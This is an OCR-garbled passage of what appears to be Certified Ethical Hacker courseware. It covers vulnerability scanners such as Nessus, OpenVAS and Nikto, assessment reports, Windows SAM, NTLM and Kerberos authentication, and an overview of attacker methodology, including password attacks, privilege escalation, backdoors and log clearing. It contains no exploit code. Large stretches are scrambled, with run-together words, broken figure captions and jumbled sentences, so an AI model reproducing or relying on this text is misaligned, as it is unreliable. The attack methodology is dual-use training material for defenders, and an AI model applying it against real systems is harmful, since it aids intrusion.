ical andCountermensores
Mackin ©by E-Comel
Copyright
Vulnerability
assessment
MalwareandBotnetdetection
Configuration
andcompliance
auditing
9
Scanning
auditing
virtualized
and platforms andcloud
Figure57:Vulnerability
scanning Nessus
using
GFILanGuard
Source:https://www.gfi.com
GFI LanGuardscans for,detects,assesses,and rectifiessecurity
vulnerabilitiesi n a
networkand its connecteddevices.Thisis donewith minimaladministrativeeffort. It
scans the operating
systems, virtual environments,and installedapplications
through
vulnerabilitycheckdatabases.It enablesanalysisof the state of network security,
identifiesrisks,
andofferssolutionsbeforethe system can be compromised,
Features:
for operating
©. Patchmanagement applications
andthird-party
systems
©
Vulnerability
assessment.
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘AWeb console
reporting
Tracklatestvulnerabilitiesandmissingupdates
Integration applications
with security
9
Network
device
checks vulnerability
Networkandsoftware
auditing
Support
forvirtual environments
ieee
are + Qvimwrsnoes
Me ©
sae
© rc
treaties
oe
©
vnoerat
tcnne
‘Openvas
5.8:scanning
GF
Figure Vunerablty using LanGuard
Source:http://www.openvas.org
is a framework
COpenVAs of severalservices andtools thatoffera comprehensive
and
powerful
vulnerability
scanningandvulnerability management solution.Theframework
is part of Greenbone commercialvulnerability
Network’s solution,
management
developments
fromwhichhavebeencontributedto the open-source communitysince
2008.
scanner is accompanied
Theactualsecurity bya regularly feedof Network
updated
Vulnerability
Tests(NVTs),
over 50,000
i n total
ical andCountermensores
Mackin ©by E-Comel
Copyright
Deshberd Scio Conran Exran—_Adminntraton
10101016 135Rep
rc Report
sts:
weak
Cipher
Sutes
timestamps %
10101016
10.10.1016
s380Rcp
generar EN
ED
Figure3:Vulnerability
scanning OpenvAs
using
Nikto
Source:https://cirt.net
Nikto is an Open Source(GPL)webserver scanner that performs
comprehensive
tests
against web servers for multiple
items,including
over 6700 potentially
dangerous
files
orprograms,checksforoutdated versions of over 1250servers, andchecksforversion
specific
problems
on over 270 servers. It alsolooksat server configuration
items suchas
the presenceof multiple indexfilesand the HTTPserver optionsandwill attemptto
identify
installedweb servers andsoftware.
Features:
(Unix
SSLSupport or maybe
with OpenSSL Peri/NetSSL)
Windowswith ActiveState’s
Aull HTTPproxy support
Checksforoutdatedserver components
Savesreportsi n plain
text,XML,HTML, NBEor CSV
Template
‘A engineto easily customizereports
multiple
‘Scans ports server, or multiple
on a serversvia inputfile
IDSencoding
LibWhisker’s techniques
Identifiesinstalledsoftwarevia headers,
favicons,
andfiles
Hostauthentication
withBasicandNTLM
ical andCountermensores
Mackin ©by E-Comel
Copyright
Subdomain
guessing,
‘Apache
andcgiwrapusernameenumeration
Scantuningto includeor excludeentire classesvulnerability
for authorizationrealms(including
Guessescredentials
of
checks
many default1Dand
combinations)
password
e:
www.certifiedhacker.com
TargetPort 80
2019-11-19 20:41:24
(GTB)
ackingX-Frame-Optionsheader present
ion headernot defined, This
is
can hint to the u:
header
agent t o protect against sone forns of XSi
The X-Content-Type-Options header not set. This could a llow
a
is
to render the content of the site i n different fashion to the MIME
type
rtifiedhacker zip:
Potentially interesting archive/cert
Error Limit (26) reachedfor host, giving up. file
Last
error
found
Last
error
ERROR:
ERROR: ErrorL imit (20) reached for host, giving up.
Scan terminated: 19 error(s) and4 item(s) reported o n renote host
EndTine 2019-11-1920:51:15 (GTB) (591seconds)
L hostis) te
Figure
5.10:Screenshot
of Nkto
Listedbeloware some of the additionalvulnerabilityassessmenttools:
=
FreeScan(https://freescan.qualys.com)
Qualys
=
AcunetixWebVulnerability
Scanner(https://www.acunetix.com)
=
(https://www.rapid7.com)
Nexpose
=
Network
SAINT
Security (hetps://www.beyondtrust.com)
Scanner
(https://www.saintcorporation.com)
MicrosoftBaseline Analyzer
Security (MBSA) microsoft.com)
(https://www.
(AVDS)
beSECURE (https://www.beyondsecurity.com)
Pro(https://www.coresecurity.com)
CoreImpact
N-StalkerWebApplication Scanner(https://www.nstalker.com)
Security
Vulnerability
ManageEngine Plus(https://www.manageengine.com)
Manager
ical andCountermensores
Mackin ©by E-Comel
Copyright
AssessmentToolsfor Mobile
Vulnerability
onthe
based Metrics | Sees
5.1: ~ rik
Figure Vulners
Scanner ertcal core
Modul
05 525
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Vuners
Seanner
5.12:VulnesScanner medium
Figure —
riskscore
SecurityMetrics
Mobile
Source:https://www.securitymetrics.com
SecurityMetrics Mobile is a mobiledefensetool that helps to identify
mobiledevice
wulnerabilitiesto protect sensitive data. It helps
customers’ to avoid threatsthat
originatefrommobilemalware,devicetheft,Wi-Finetworkconnectivity, data entry,
personal and businessuse, unwarrantedapp privileges, data and device storage,
account dataaccess,Bluetooth, (IR),
Infrared communication (NFC),
Near-field andSIM
SD
and cards.
MobileScancomplies
SecurityMetrics with PCI SSC(Payment Card Industry Security
Council)
Standards guidelines
to prevent mobiledatatheft.Oncompletion of a scan,the
reportgenerated
comprisesa total riskscore, a summary of discoveredvulnerabilities,
on howto resolvethreats,
andrecommendations
ical andCountermensores
Mackin ©by E-Comel
Copyright
securitysurnies
Figure5.1:SecurityMetrics
Mobile
ical
—
result
‘Vulnerability
Assessment Concepts
Classification
‘Vulnerability and
‘Vulnerability
Arsossment Solutions
Vulnerability
Assessment Reports
report
closes
risks
detected
after
Thewnerabltyassessment the seaning network
Thereport
alerts
Information
theorganization
avallabe
of possibleattacks
is ueed
tf
andsuggests
flaws
countermesures
in thereports security
Vulnerability
Asessment Report
SE AssessmentReports
Vulnerability
Ed
In the vulnerability assessmentprocess,once all the phases are completed,the securityteam
will review theresultsandprocess theinformationto preparethefinal report.In thisphase,
the
security team will try to discloseany identifiedvulnerabilities,
documentany variations and
findings, andincludeall thesein the finalreportalong with remediationstepsto mitigatethe
Identifiedrisks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thevulnerability
assessmentreportdiscloses through
therisksthat are detected scanningthe
GFlLanGuard,
network.Toolssuchas Nessus, and QualysVulnerability
Management are used
for vulnerability
assessment.Thesetools provide a comprehensive assessmentreportin a
specifiedformat. The report alerts the organizationto possible attacks and suggests
countermeasures.
The reportprovides
detailsof all the possible
vulnerabilitieswith regard to the company’s
policies.
security Thevulnerabilitiesare categorized
basedo n severityinto three levels:High,
Medium,andLowrisk.
High-risk
vulnerabilitiesare thosethat mightallowunauthorizedaccessto the network.These
vulnerabilitiesmust be rectifiedimmediatelybeforethe networkis compromised, The report
describesdifferentkindsof attacksthat are possiblegiventhe organization's
set of operating
networkcomponents,
systems, andprotocols.
report
Thevulnerability
must
assessment
to,
but are not limited thefollowing
include, points:
‘=
date
of
The
name
and
Thevulnerability's
discovery
its mapped
CVEID
‘=
Thescore basedon Common (CVE)
VulnerabilitiesandExposures databases
vulnerability
A detaileddescription
of the
The
impact
vulnerability
of the
Detailsregarding
theaffectedsystems
Detailsregarding
the process neededto correct the vulnerability,
including
information
patches,
configuration
fixes,andportsto beblocked,
A proof (PoC)
ofconcept ofthe vulnerability (ifpossible)
forthe system
Vulnerability Report
Assessment
Sean
Information information
Target esol
5.25:Components
Figure unerabilly
of» assessment report
ical andCountermensores
Mackin ©by E-Comel
Copyright
Analyzing
Vulnerability
Scanning
Report
=
AnalyzingVulnerability
ScanningReport
A vulnerability reportprovides
assessment detailedinformationon the vulnerabilitiesfoundi n
the computing
computing systems The
environment. reporthelps
(such as web servers, firewalls, identify ofthe
organizations the security
routers,email,
posture
andfile services)
solutionsto reduce systemfailures,An ethical hackermust be careful in analyzing
andprovide
the
vulnerabilityassessmentreportsto avoidfalsepositives,
‘The
assessmentreport helps organizations to take mitigation stepsto proactively
avoidriskby
Identifying,
tracking,andeliminating security vulnerabilities.
Vulnerabilityreportscover thefollowing elements:
=
Scaninformation: Providesinformation suchas the name of the scanningtool,its
version, andthe networkportsto bescanned
Target information:Containsinformationaboutthe targetsystem’s name andaddress.
© <OS>: Showsthe
of
the nameandaddressthe host
Services:
date
Givesthe
of the test
Definesthe networkservices bytheir namesandports.
Classification:
Allowsthe system administratorto obtainadditionalinformationabout
the scan,suchas its origin.
5
Module Page$40 ical andCountermensores
Mackin
©
Copyright
by E-Comel
=
Assessment: Providesinformation
regarding assessmentof discovered
the scanner’s
vulnerabilities,
Vulnerability are classified
assessmentreports into two types:
+
+
Security
Security
Vulnerability
Reports
Vulnerability
Summaries
Security
Vulnerability
Report
Thisisa combinedreportforall the scanneddevicesandservers in the organization's
network.
Thesecurityvulnerability
report includes following
the details
+
Newlyfoundvulnerabilities
+
Openportsanddetectedservices
tofor
+
Suggestionremediation
+
Links patches
‘Asample vulnerability
security reporti s as follows:
DetailedResults
available
Exploits
ical andCountermensores
Mackin ©by E-Comel
Copyright
Vulnerability
Security Summary
Thisreporti s produced
for everydeviceor server after scanning.
It ives a summaryof the scan
resultthat includesthe following
elements:
+
flaws
Currentsecurity
+
+
Newlyd
of vulnerabilities
Categoriesvulnerabilities
etected
security
Resolved
of
Theseverityvulnerabilities
vulnerabilities
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Summary
nhs
>
module,
we have
dscustes
T hedefintonofwinery research, nerdy assessment, andvunerablty.
‘Various
ype ofwuneablties anduerablty assessment techniques
with
a
report oa
Weconcluded
andhowit dsclses
detalles
cussionon how analyte wnerabityassessment
thers
detectedater scaning
thenetwork
{inthe
nent
module,
forwilthe well
ethical
we
and
dct
wulerabisty
ensbris
pentesters utile to hacka
methodsattacker, a s
b ased
system
‘ahitionsenrol foctornting,
as hackers and
information called abouta target
onthe
sarnine, enumeration,
of
Module Summary
Thismodulediscussed vulnerability vulnerability
research, assessment, andthe vulnerability-
management life cycle.
It alsodiscussed
the CVSS vulnerability
scoring systemanddatabases
andvarious typesof vulnerabilities and vulnerability
assessmenttechniques. It described
various vulnerability
assessmentsolutionsalongwiththeir characteristics
anddescribed
various
vulnerability
assessmenttoolsthat are usedto test a hostor application
for vulnerabilities,
along for selecting
with the criteria andbestpractices the tool. Finally,
thismoduleendedwith
a detaileddiscussion a vulnerability
on howto analyze assessmentreportandhow it discloses
therisksdetectedafter scanning
a network
Thenext modulewill showhow attackers,
as well as ethicalhackers and pen testers,attempt
hacking
system collectedabouta targeti n thefootprinting,
basedo n theinformation scanning,
andvulnerability
enumeration, analysis
phases.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Certified
| Ethical Hacker
Module06:
Hacking
System
Module Objectives
Technaues
Understanding oan Acces othe Sytem
LUndestanding
o
Techniques
CreatandMaltin Remote
Accestothe Sytem
Oferet
System
Understanding
Hacking Countermssres
Module Objectives
Systemhacking is one of the most important, theultimategoalof an attacker.
andsometimes,
The attacker acquires information through techniques
such as footprinting,scanning,
enumeration,andvulnerability
analysisand then uses thisinformation
to hackthe target
Thismodulewill focuson the toolsand techniques
system. usedbyan attackerto hackthe
targetsystem,
with an overview of the hacking
The modulebegins methodology.
Next,it discusses
in detail
the various hacking suchas gainingandmaintaining
stages, access andclearing
logs.
Atthe endof this
=
module,
willable
you
theCertified
Describe
the
following:
be
Ethical
to
Hackerhacking
do
methodology
=
Explain
thedifferenttechniquesto gainaccessto a system
=
Apply
privilege techniques
escalation
Explain
differenttechniques
to gainandmaintain remote access to a system
Describe
types
ofrootkits
different
steganography
Explain andsteganalysis
techniques
Apply
differenttechniques
to hidetheevidenceof compromise
Apply
v arious systemhacking
countermeasures
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Gaining
Recess Maintaining
Accoss
8 comm
e
System
Hacking
Concepts
An attackerengagesin systemhacking attemptsusing informationcollected in earlier
footprinting, and vulnerability
scanning, enumeration, analysisphases.The following is an
ofthesephases
overview andtheinformationcollecteds o far.
Wehavealready the following
discussed in our previousmodules:
Footprinting
Module: Footprinting
is the processof accumulatingdataabout a specific
networkenvironment. In the footprinting
phase, theattackercreates a profileof the
andobtainsinformationsuchas its IP addressrange,namespace,
targetorganization
andemployees.
Footprintingfacilitates
theprocessof system hacking
byrevealing
its vulnerabilities.
For
example, the organization'swebsite may provide employee bios or a personnel
directory,whichthehacker can use for socialengineering Conducting
purposes. a Whois
query on the web can provideinformationaboutthe associated networksanddomain
namesrelated
to a specific
organization.
Scanning Module: Scanning is a procedureusedforidentifyingactive hosts,
openports,
and unnecessaryservices enabledon particular hosts.Attackersuse different typesof
scanningmethods forhostdiscovery, portandservice discovery,operating system (0S)
discovery,and evading endpoint securitydevicessuchas intrusion detectionsystems
(IDSs)andfirewalls.Thesetechniques helpattackersidentify possible vulnerabilities.
Scanning procedures suchas portscanning and ping sweeps return informationabout
the services offeredbythe live hoststhat are active on the Internet,and their IP
addresses,
ical andCountermensores
Mackin ©by E-Comel
Copyright
EnumerationModule:Enumerationis a methodof intrusive probing, through which
attackersgather informationsuchas network user lists,routingtables, flaws,
security
andSimple
andshared
NetworkManagement
(SNMP)
Protocol
data.
is
the attackerranges over the targetterritoryto glean
users,groups,applications,andbanners.
This of significance,
because
informationaboutthe network,
ical andCountermensores
Mackin ©by E-Comel
Copyright
CEH Hacking
Methodology
(CHM)
Y= rootprinting System
Hacking
(ining
Recess
Y — sansing
Y= Emmeration
| Velnerabity
ar
Clearing
Loge
CEHHacking (CHM)
Methodology
Attackersfollow a certain methodology They
to hacka system. first obtaininformationduring
thefootprinting,scanning, enumeration,andvulnerability
analysisphases, whichtheythenuse
to exploit
the targetsystem.
The figure between stepsi n the CEH hacking
showsthe steps and flow mechanisms
methodology
(CHM).
VY reotprinting System
Hacking
Cenching
Passwords
Y
Escalating
Privileges
Access
‘Maintaining
Executing
Applications
isingles
‘Vulnerability
Analysis Clearing
Loge
Tacks
Covering
Figure6.1:
CEHhacking
methodology
Module
Page6 S48
tical
Making
and by CountermensoresCopyright©
Comet
Thereare fourstepsin theCHM:
Aftergainingaccess,attackers
thenescalatetheirprivileges
to administrative levels,
to
perform a protectedoperation.Attackersexploit
vulnerabilitiesthat exist i n OSsand
softwareapplications privileges.
to escalate
‘Maintaining
Access
Aftersuccessfully
gainingaccessandescalating
privileges
to the targetsystem,
attackers
ensure
high
executing
files.
that levelsof access are
andstealing,
applications
malicious
maintainedto
hiding,
perform
maliciousactivities suchas
with sensitive system
or tampering
Clearing
Logs
To maintain futuresystem access,attackersattemptto avoidrecognition bylegitimate
systemusers. To remain undetected, attackerswipe out the entries corresponding
to
theiractivities in the systemlogs,
thusavoiding detectionbyusers.
ical andCountermensores
Mackin ©by E-Comel
Copyright
System Goals
Hacking
Hacking Stage
bypat
acest ‘Technique
contralto /Exploit
Goat Used
@Gsining soca
Te gla
Access ‘roltaton,
engineering
©Excataing
Priviteges
©Executing
Applications eons
@Hising
rites
©Covering
Tacks
System Goals
Hacking
Every
criminalhasa certain goalthat theyintend to achieve.Likewise, attackerscan have
certain goalsfor performing systemattacks.Thefollowingare some examples of thegoalsof
system attackers.Thefollowingdiagram showsthesegoals at different hacking
stagesandthe
to them,
used achieve
techniques
Hacking-Stage Goat ‘Technique/Exploit
Used
©
Escalating
Privileges
Executing
©
Applications
@Hiding Fies
©Covering
Tracks Geming
oes
=
GainingAccess
In systemhacking,
the attackerfirst tries
to gain access to a targetsystemusing
informationobtainedand loopholes
found i n the access control mechanism
of the
ical andCountermensores
Mackin ©by E-Comel
Copyright
theycan freely
i n gainingaccessto the system,
system.Oncethe attackersucceeds
various maliciousactivities suchas stealing
perform sensitive data,implementing
a
snifferto capturenetworktraffic,andinfecting
thesystemwithmalware.
Theattacker
canthen use techniques suchas password cracking,
vulnerability
exploitation,
andsocial
engineeringtacticsto gainaccessto the targetsystem.
Escalating
Privileges
After gaining access to a systemusing a low-privileged normal user account, the
attackermaythentryto increase theiradministrator privileges to performprotected
systemoperations, so that theycan proceedto the next level of the systemhacking
phase, which is the execution of applications.The attackerexploits known system
vulnerabilitiesto escalateuser privileges.
Executing
Applications
the attackerhasadministratorprivileges,
‘Once theycan attempt to installmalicious
programssuch as Trojans, backdoors,rootkits,and keyloggers, whichgrantthem
remote system access andenablethemto remotely execute maliciouscodes.Installing
rootkitsallowstheattackerto gainaccessat the OSlevelto perform malicious activities.
To maintain access for later use,theymay even installbackdoors.
Hiding
Files
Attackers use rootkitsandsteganography techniques to attemptto hidethe malicious
filestheyinstallo n the system,
andthustheir activities,
Covering
Tracks
To remain undetected, forthe attackers
it is important to erase fromthe systemall
evidenceof security
compromise. To achievethis,theymightmodify or delete logs
in
the systemusing certain log-wipingutilities,
thus removingall evidenceof their
presence.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
1 System
Hacking
Concepts Escalating
Privileges
Maintaining
Accoss
8 ame
e
GainingAccess
Asdiscussed CHMinvolves
earlier, various stepsattackers
followto hacksystems. Thefollowing
sections discuss
thesestepsi n greaterdetail. Thefirst step,whichis the gaining of access,
involvesthe use of various techniques that attackers
employ to gain access to the target
system.These techniques include cracking passwords,exploitingbuffer overflows, and
vulnerabilities.
identifying
ical andCountermensores
Mackin ©by E-Comel
Copyright
MicrosoftAuthentication
Recounts
Manager
Security (SAMDatabase
databace
in domain,
are lear
Passwords never toed in
shed,a ndhe results
are sored
inthe SAM
txt and
‘The
NTLM protocltyes ar
authentication as fllows:NTUM
ferent hashing
method
Kerberoswhich
Xerheroe
its
provides
Rathentiaion
Microsofthasupgraded default
authentication
protacolto
authentication
a stonger forclnt/sever
10
#8Windows
Cracking
Passwords
Microsoft Authentication
users login
‘When to a Windowscomputer,a series of steps is performed for user
authentication.TheWindowsOSauthenticatesi ts users with the helpof three mechanisms
(protocols)
provided
byMicrosoft
=
Security (SAM)
AccountsManager Database
Windowsuses the Security AccountsManager (SAM) databaseor Active Directory
Database to manageuser accountsand passwords i n hashed format (aone-wayhash).
Thesystem doesnot store the passwordsin plaintext formatbut in a hashedformat,to
andthe Windowskernelobtainsandkeeps
As thisfile consists of a filesystem
an exclusive
this provides
lock,
the
protectthemfromattacks.ThesystemimplementsSAMdatabaseas registry
filesystem a file,
lockon the SAMfile,
some measure of securityfor the
of passwords.
storage
It is not possible
Becausethe system locksthe SAM file with an exclusivefilesystem of
to copythe SAMfile to anotherlocationin the case online attacks.
lock,a user cannot
copyor move it whileWindowsis running.Thelockdoesnot releaseuntil the system
throws a blue screen exception, or the OS hasshut down. However, to makethe
password hashesavailableforofflinebrute-force attacks, attackerscan dumpthe on-
disk contents of the SAM file usingvarious techniques. TheSAM file uses an SYSKEY
function(inWindowsNT 4.0 and later versions) to partiallyencryptthe password
hashes.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Evenifhackersuse subterfuge
techniques to discoverthecontents,theencryptedkeys
with a one-way hashmakeit difficult to hack.In addition,some versions have a
secondarykey,whichmakestheencryption specific
to that copyof theOS.
NTLMAuthentication
NT LAN Manager
(NTLM)
is a default authenticationschemethat performs
authenticationusinga challenge/response Becausei t does not relyon any
strategy.
official protocol
specification, that it workseffectively
there is no guarantee i n every
it has beenusedi n some Windowsinstallations,
situation. Furthermore, whereit
successfullyworked. NTLM authentication consists of two protocols: NTLM
authentication protocol and LAN Manager (LM)authentication protocol.These
protocolsuse different hash methodologies passwords
to store users’ in the SAM
database.
Kerberos
Authentication
Kerberos
is a networkauthenticationprotocol
that provides
strongauthenticationfor
client/server
applications through secret-key cryptography.This protocol
provides
in that boththe server andthe user verify
mutualauthentication, eachother'sidentity.
Messages
sent through
Kerberosprotocol
are protected
againstreplay
attacksand
eavesdropping.
Kerberosemploysthe Key DistributionCenter(KDC), whichis a trustedthird party.This
logically
consists of two distinct parts:an authenticationserver (AS)and a ticket
aranting (TGS).
server Kerberos to provea user's
uses“tickets― identity
Microsofthasupgradedits defaultauthenticationprotocolto Kerberos, whichprovides
authentication
a stronger applications
for client/server than NTLM:
Enternetworkcredentials
Enteryour credentials
to connectto:RO
1 Bemember
my creentals
‘The
password
is
user name or
ox
ncattect
Serenshot ofWindowsauthentication
Figure6:3:
ical andCountermensores
Mackin ©by E-Comel
Copyright
How HashPasswordsAreStoredin WindowsSAM?
WindowsO Ssuse a Security AccountManager
(SAM)databasefile to store user passwords.
The
SAMfileis storedat %SysternRoot%/system32/config/SAM
i n Windows systems,andWindows
underthe HKLM/SAM
mounts it in the registry registryhive. It stores LM or NTLMhashed
passwords.
OEE LM
sword hashung NTA
whichis susceptible
LM/NTLM
to cracking.
hash
Newversions of Windowsstill
supportLM hashesfor backwardcompatibility; however, Vista and later Windowsversions
disableLMhashesbydefault.
in during
of
TheLM hashis blank the newer versions Windows.
the optionto remove LM hashesenables an additional check
operationsbutdoesnot immediately
Selecting
passwordchange
clearLM hashvaluesfromtheSAM.TheSAMfilestores a
“dummy―
valuei n its database,
whichbearsno relationship to the user'sactualpasswordandis
the sameforall user accounts.It is not possible
to calculate
LM hashes forpasswords exceeding
14 charactersi n length.Thus, the LM hashvalue is set to a “dummy―
valuewhena user or
administratorsetsa password ofmore than14characters.
6
Module S55
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
c: \windows\system32\config\SAM
v v
Figure65:SAMfle
Note: LM hashes
a re disabled LM is blankin those
i n WindowsVistaand laterWindowsOSs;
systems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
NTLMAuthenticationProcess
Domain Controller
‘Windows
NTLM AuthenticationProcess
authentication:LM,NTLMv1,and
NTLM includesthree methodsof challenge-response
NTUMv2, all ofwhichuse the same technique Theonlydifference
forauthentication. between
them is the level of encryption.In NTLMauthentication,
the clientand server negotiate
an
authentication protocol. This is accomplished
through
the Microsoft-negotiatedSecurity
Provider(SSP).
Support
‘Windows
DomainController
‘amped roqen
aOC |ieoruam
he
espe
ve
le °
66; NTLMauthentication
Figure process
Thefollowing stepsdemonstrate
theprocessandthe flowof clientauthenticationto a domain
controllerusingany NTLMprotocol:
+
the username andpassword
Theclienttypes into the logon
window.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Windowsruns the password througha hashalgorithm
andgenerates
a hashforthe
password
that is enteredi n the logon
window.
Theclient computer
sendsa loginrequestalong
with a domainname to the domain
controller.
Thedomaincontrollergeneratesa 16-byte randomcharacterstringcalleda “nonce,―
to
whichit sends the clientcomputer.
Theclientcomputer encryptsthe nonce with a hashof the user password
andsendsit
backto the domaincontroller.
Thedomaincontroller retrieves the hashof theuser passwordfromthe SAManduses it
to encrypt the nonce. Thedomaincontrollerthen compares the encrypted valuewith
the valuereceivedfromthe client.A matching valueauthenticatesthe client,
andthe
logon i s successful.
Note:Microsofthasupgraded its defaultauthenticationprotocol
to Kerberos,
whichprovides
a
authentication
stronger for client/serverapplications
thanNTLM,
ical andCountermensores
Mackin ©by E-Comel
Copyright
KerberosAuthentication
Keyistibution
Center
KOC)
i abn et
‘AlcanServer
KerberosAuthentication
Kerberosis a network authenticationprotocol that providesstrongauthenticationfor
client/serverapplications throughsecret-key cryptography, which provides mutual
authentication.Both the server and the user verifyeachother's identity.
Messagessent
throughthis protocol
are protected replay
against attacksandeavesdropping,
KeyDistribution
Center
(KOC)
Ey
Server
‘Aeplcaton
Kerberosemploys
authentication
Figure67:Kerberos
process
the KDC,whicha trustedthird party,and consistsof two logically distinct
parts:a n ASand a TGS.Theauthorizationmechanism of Kerberosprovides the user with a
ticket-granting
ticket (TGT)
that serves post-authentication
for later access to specific
services,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Single
Sign-On
via which the user need not re-enter the password again to access any
authorizedservices. Notably, there is no directcommunication betweenthe application
servers
andthe KOC; the service tickets,even if packed byTGS,reachthe service onlythrough the
who
client
is to them.
willing access
ical andCountermensores
Mackin ©by E-Comel
Copyright
PasswordCracking
“© cracking
Password
are
techniquesusedto recover passwords
fromcomputer
|G Attackers cracking
use password to gainunauthorized
techniques access
ta vulnerablesystems
|G Mostofthe password
cracking are succesful
techniques because
of weak.
oreasilyguessable
passwords
PasswordCracking
Passwordcracking is the process of recovering passwords from the data transmittedbya
computer
system
administrators
or fromthe datastored
helpa user recover a forgotten
to check for easily
or lost password,
breakable
of a
i n it. Thepurpose cracking
as a preventive
passwords,
password might beto
measure by system
or for use byan attacker to gain
Unauthorized
system access.
Hacking
often begins
with password-cracking
attempts.A password
is a keypiece of
information Consequently,
to accessa system.
necessary most attackersuse password-cracking
techniquesto gain unauthorizedaccess. An attackermay eithercracka password
manuallyby
guessingit or use automated tools andtechniques suchas a dictionaryor a brute-force
method. Most password-cracking techniques are successful becauseof weak or easily
-uessable
passwords.
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
of PasswordAttacks
Types CEH
knowledge
| attack
attackerdoesnot needtechnical
‘The to crackthepassword,
henceiisknown
Non-Electronie se non-technical
‘tacks
Theattacker
performs
password cracking
withoutcommunicating
with the authorizing
party
OtnineAttacks
|
Theattacher
system password
copiesthetage’
atadiferent lesion
on his own
lean hentries to crackpasswords
of PasswordAttacks
‘Types
Passwordcrackingone of the crucial stagesof systemhacking.
is Password-cracking
oftenexploit
mechanisms otherwiselegal
means to gain unauthorized
systemaccess,suchas
recoveringa user'sforgotten password. of password
Classification attacksdepends
on the
=
actions,whichare of thefollowing
attacker's
Non-Electronic
four
types:
Attacks:Thisis, for most cases,the attacker's
firstattemptat gaining
targetsystempasswords.
Non-electronic or non-technical
attacksdo not require any
knowledge
technical abouthacking or systemexploitation.
Techniques usedto perform
attacksincludeshouldersurfing,
non-electronic socialengineering, dumpster
diving,
etc.
Active Online Attacks: This is one of the easiest ways to gain unauthorized
systemaccess. Here,the attackercommunicates with the target
administrator-level
machineto gain password access. Techniques
usedto perform active online attacks
include password guessing,dictionaryand brute-forcing
attacks,hash injection,
LLMINR/NBT-NS poisoning, use of Trojans/spyware/keyloggers,
internal monologue
Markov-chain
attacks, Kerberos
attacks, cracking,
password etc.
PassiveOnlineAttacks:A passiveattackis a typeof systemattackthat doesnot leadto
any changesin the system.In this attack,
the attackerdoesnot haveto communicate
with the system,but passively monitor or record the data passingover the
communication channel,to andfromthe system. Thedata are then usedto breakinto
the system.Techniques usedto perform passiveonlineattacksincludewire sniffing,
man-in-the-middleattacks,
replay attacks,
etc.
ical andCountermensores
Mackin ©by E-Comel
Copyright
OfflineAttacks:Offlineattacksreferto password
attacksi n whichan attackertries to
recover cleartextpasswords
froma password hashdump. Offlineattacksare often time-
consuming buthavea highsuccessrate,as thepassword hashes c an bereversed owing
to their smallkeyspace and short length.Attackersuse pre-computed hashesfrom
rainbow tablesto perform
offlineanddistributed
networkattacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Non-ElectronicAttacks
Social Surfing
Engineering
Shoulder Dumpster
Diving
|©
a
Convincingpeople
for
to
revealpasswords
© Looking
either
the
user'skeyboardor
©Searching sensitive
inthe user's
information
printer
trash screen whilehe/she
logging
in
is trash-bins,
bins,a ndinfonthe user's
deskfor sticky
notes
0)
Non-ElectronicAttacks
Non-electronic,or non-technical,
attacksdo not require technicalknowledge of methodsof
systemintrusion. Thereare threetypesof non-electronicattacks:
socialengineering,shoulder
surfing,
anddumpster diving.
=
SocialEngineering
In computer security,socialengineeringis used to denote a non-technicaltypeof
inteusionthat exploitshumanbehavior.Typically, it heavily
relieson humaninteraction
and often involvestricking other people into breaking
normalsecurityprocedures. A
socialengineerruns a “con game―to break securityprocedures. For example, an
attackerusingsocialengineeringto breakinto a computer networkmight tryto gainthe
trust of the authorizeduser to accessthe targetnetworkandthen extract information
a run-through
to compromise networksecurity.Socialengineeringis, i n effect, usedto
procureconfidentialinformation bydeceivingor swayingpeople. An attackercan
himself/herself
disguise as a user or system password
administratorto obtainthe user’s
Socialengineersexploit the fact that people,i n general, try to build amicable
relationships
withtheir friendsandcolleagues andtendto be helpful andtrusting.
Another trait of socialengineeringrelieson the inability
of people to keep up with a
culturethat reliesheavilyon information technology.Most people are unaware of the
valueof the informationtheypossess,andas such, onlya handfulcare aboutprotecting
their information. Socialengineerstypically searchdumpsters to acquirevaluable
information.Furthermore,socialengineers find it more challenging to obtain the
combination or a health-club
to a safe, locker,as compared to thecase of a password.
Thebestdefenseis to educate,train,and create awareness aboutthisattackandthe
valueofinformation,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Surfing
Shoulder
Shouldersurfing i s @ technique of stealing passwords byhovering near the legitimate
users and watching them enter their passwords. In this typeof an attack,the attacker
‘observes
the user’skeyboard or the screen as theylogin, and monitors whatthe user
refersto whenentering their password, for example, a n object
on their deskfor written
passwords or mnemonics. However, this attack can be performed onlywhen the
attackeris in closeproximity to the target.
Thisattackcan alsobeperformed
i n thecheckout
linesof grocerystores,forexample,
when a potentialvictim swipesa debit cardand enters the required
PIN (Personal
IdentificationNumber). PIN typically
hasfour digits,
andthisrendersthe attackeasy
to perform.
Dumpster Diving
“Dumpster diving― attackmethodthat employs
is a key significant
failuresi n computer
i n the targetsystem.
security Thesensitive informationthat people crave, protect,and
devotedly secure can be accessed by almost anyone willing to perform garbage
searching. Looking throughthe trash is a type of low-techattack with numerous
implications.
Dumpster diving was quitepopular i n the 1980s.Theterm itselfrefersto the collection
of useful,
general informationfromwaste dumps suchas trashcans,
curbsidecontainers,
and dumpsters. Even today,curious and/ormaliciousattackerssometimes find
discarded mediawithpassword files,manuals, reports, creditcardnumbers,
receipts, or
other
sensitive
Examination
documents.
products dumps help
of waste from can attackersi n gainingunauthorized
access to the targetsystems, and there is ample evidenceto supportthis concept.
Support staffoften dump sensitive informationwithout heeding to who maybeableto
accessit later.Theinformationthusgathered can thenbeusedbyattackersto perform
other
types of attacks,
suchas socialengineering,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Active Online Attacks:Dictionary, and
Brute-Force,
Rule-basedAttack
Dictionary
AttackBrute-Force Attack
Rule-based
Attack
file
@ AdictionaryIs
used
@ Theprogramtries
loadedinto the cracking every combination of
©Thisattackis
theattackergets
‘when
against characters
application
until
that runs
user accounts password
the
is broken
some information
aboutthe password
of less
Frequency
[|passwords
attacks
the collected
through
from information
socialengineering
wayandmanually
or anyother
